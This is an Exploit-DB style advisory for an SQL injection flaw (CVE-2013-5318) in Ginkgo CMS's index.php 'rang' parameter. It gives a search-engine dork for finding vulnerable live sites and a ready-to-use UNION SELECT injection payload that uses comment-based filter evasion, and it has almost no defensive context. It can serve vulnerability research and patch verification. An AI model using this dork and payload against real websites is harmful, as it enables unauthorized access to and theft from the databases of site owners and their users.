Ginkgo CMS - 'index.php?rang' SQL Injection
Author: Raw-x
type: webapps
platform: php
port:
date_added: 2013-08-02
date_updated: 2013-08-10
verified: 1
codes: CVE-2013-5318;OSVDB-96246
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comginkgo5.zip
__ ___ ________ __ __ ____ __ __
/\ \ /\_ \ /\_____ \ /\ \ /\ \ /\ _`\ /\ \/\ \
\ \ \ __ __\//\ \\/____//'/'\ \ \___ __ ___\ \ \/'\ \ \ \L\ \ \ \ \ \
\ \ \ __/\ \/\ \ \ \ \ //'/' \ \ _ `\ /'__`\ /'___\ \ , < \ \ , /\ \ \ \ \
\ \ \L\ \ \ \_\ \ \_\ \_ //'/'___ \ \ \ \ \/\ \L\.\_/\ \__/\ \ \\`\ __\ \ \\ \\ \ \_\ \
\ \____/\ \____/ /\____\/\_______\\ \_\ \_\ \__/.\_\ \____\\ \_\ \_\/\_\\ \_\ \_\ \_____\
\/___/ \/___/ \/____/\/_______/ \/_/\/_/\/__/\/_/\/____/ \/_/\/_/\/_/ \/_/\/ /\/_____/
############################################################################################
# Exploit Title : Ginkgo CMS SQL injection #
# Date : 31 July 2013 #
# Exploit Author : Raw-x #
# Site : http://www.ginkgo-cms.com/ #
# Tested on : Linux #
############################################################################################
Dork:
~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~
Examples:
http://server/index.php?rang=5'/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -
############################################################################################
# Thanks to: lulzhack.ru | zentrixplus.net #
############################################################################################